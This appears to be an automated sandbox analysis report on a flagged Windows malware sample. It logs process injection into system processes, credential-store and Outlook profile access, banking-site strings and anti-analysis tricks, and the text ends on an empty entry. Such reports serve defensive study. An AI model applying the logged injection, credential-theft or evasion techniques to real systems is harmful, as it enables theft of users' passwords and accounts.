Source: systeminfo.exe, 00000006.00000003.2085669071.000000000099E000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.2083257438.0000000000972000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3430481412.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.2083437853.0000000000993000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3430481412.0000000000993000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: J1VpshZJfm.exe	Virustotal: Detection: 63%
Source: J1VpshZJfm.exe	ReversingLabs: Detection: 78%

Source: unknown	Process created: C:\Users\user\Desktop\J1VpshZJfm.exe "C:\Users\user\Desktop\J1VpshZJfm.exe"
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\J1VpshZJfm.exe"
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\ctfmon.exe "C:\Windows\SysWOW64\ctfmon.exe"
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\J1VpshZJfm.exe"	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\ctfmon.exe "C:\Windows\SysWOW64\ctfmon.exe"	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"

Source: C:\Windows\SysWOW64\systeminfo.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: J1VpshZJfm.exe

Static file information: File size 1276928 > 1048576

Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: J1VpshZJfm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: J1VpshZJfm.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: sysinfo.pdb source: svchost.exe, 00000002.00000003.1803255600.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806615054.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ctfmon.pdb source: UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sysinfo.pdbGCTL source: svchost.exe, 00000002.00000003.1803255600.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806615054.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UNUqLBRwwpkr.exe, 00000004.00000002.3430840251.00000000006FE000.00000002.00000001.01000000.00000005.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3430430682.00000000006FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: ctfmon.pdbGCTL source: UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: J1VpshZJfm.exe, 00000000.00000003.1584867996.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1584048216.0000000004280000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1592401830.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729318637.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727339443.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004890000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1845119326.0000000004538000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1852230516.00000000046E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: J1VpshZJfm.exe, 00000000.00000003.1584867996.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1584048216.0000000004280000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1592401830.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1729318637.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727339443.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004890000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1845119326.0000000004538000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1852230516.00000000046E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: systeminfo.exe, 00000006.00000002.3430481412.0000000000919000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918430505.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000013FFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: systeminfo.exe, 00000006.00000002.3430481412.0000000000919000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918430505.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000013FFC000.00000004.80000000.00040000.00000000.sdmp

Source: J1VpshZJfm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: J1VpshZJfm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: J1VpshZJfm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: J1VpshZJfm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: J1VpshZJfm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E94B37 LoadLibraryA,GetProcAddress,

0_2_00E94B37

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EB8945 push ecx; ret	0_2_00EB8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E8C5 push edx; retf	2_2_0041E8C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E8B1 push edi; iretd	2_2_0041E8BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E8B3 push edi; iretd	2_2_0041E8BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004058BC push ebx; ret	2_2_004058BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A94B push esp; iretd	2_2_0041A950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041F2B3 push ebp; retf	2_2_0041F2BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417B03 push esp; iretd	2_2_00417B3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401B95 push es; iretd	2_2_00401C14
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004114B7 push ds; iretd	2_2_004114B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040157F push edx; iretd	2_2_00401580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041761E pushfd ; iretd	2_2_00417622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406E30 push es; ret	2_2_00406E31
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406EE5 push cs; retf	2_2_00406EEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413EF3 push eax; retf	2_2_00413FEF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A696 push 8E962003h; retf	2_2_0041A69B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411716 push ss; retf	2_2_00411741
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413FDE push eax; retf	2_2_00413FEF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FA0 push eax; ret	2_2_00402FA2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350225F pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035027FA pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx	2_2_035309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350283D push eax; iretd	2_2_03502858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350135E push eax; iretd	2_2_03501369

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00E948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00E948D7
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00F15376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00F15376

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00EB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EB3187

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	API/Special instruction interceptor: Address: 1881FFC
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D324
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D7E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D944
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D504
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D544
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52D1E4
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE530154
Source: C:\Windows\SysWOW64\systeminfo.exe	API/Special instruction interceptor: Address: 7FFEFE52DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\systeminfo.exe TID: 5824	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 5824	Thread sleep time: -88000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe TID: 6976	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe TID: 6976	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00EF445A
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFC6D1 FindFirstFileW,FindClose,	0_2_00EFC6D1
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00EFC75C
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EFEF95
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EFF0F2
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EFF3F3
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00EF37EF
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00EF3B12
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EFBCBC

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E949A0

Source: J14f8-3.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: systeminfo.exe, 00000006.00000002.3433756418.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: active Brokers - COM.HKVMware20,11696503903
Source: systeminfo.exe, 00000006.00000002.3430481412.0000000000919000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: J14f8-3.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: J14f8-3.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: J14f8-3.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: J14f8-3.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: J14f8-3.6.dr	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: systeminfo.exe, 00000006.00000002.3433756418.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169650
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: J14f8-3.6.dr	Binary or memory string: global block list test formVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: J14f8-3.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: UNUqLBRwwpkr.exe, 00000009.00000002.3431368900.000000000146F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: J14f8-3.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: AMC password management pageVMware20,11696503903
Source: systeminfo.exe, 00000006.00000002.3433756418.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11
Source: J14f8-3.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: J14f8-3.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: firefox.exe, 0000000B.00000002.2194651325.000002839407C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
Source: J14f8-3.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: J14f8-3.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: J14f8-3.6.dr	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: J14f8-3.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: J14f8-3.6.dr	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: J14f8-3.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: J14f8-3.6.dr	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: J14f8-3.6.dr	Binary or memory string: discord.comVMware20,11696503903f
Source: J14f8-3.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: systeminfo.exe, 00000006.00000002.3433756418.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,116965
Source: systeminfo.exe, 00000006.00000002.3433756418.000000000791A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004175A3 LdrLoadDll,

2_2_004175A3

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F03F09 BlockInput,

0_2_00F03F09

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00E93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00E93B3A

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

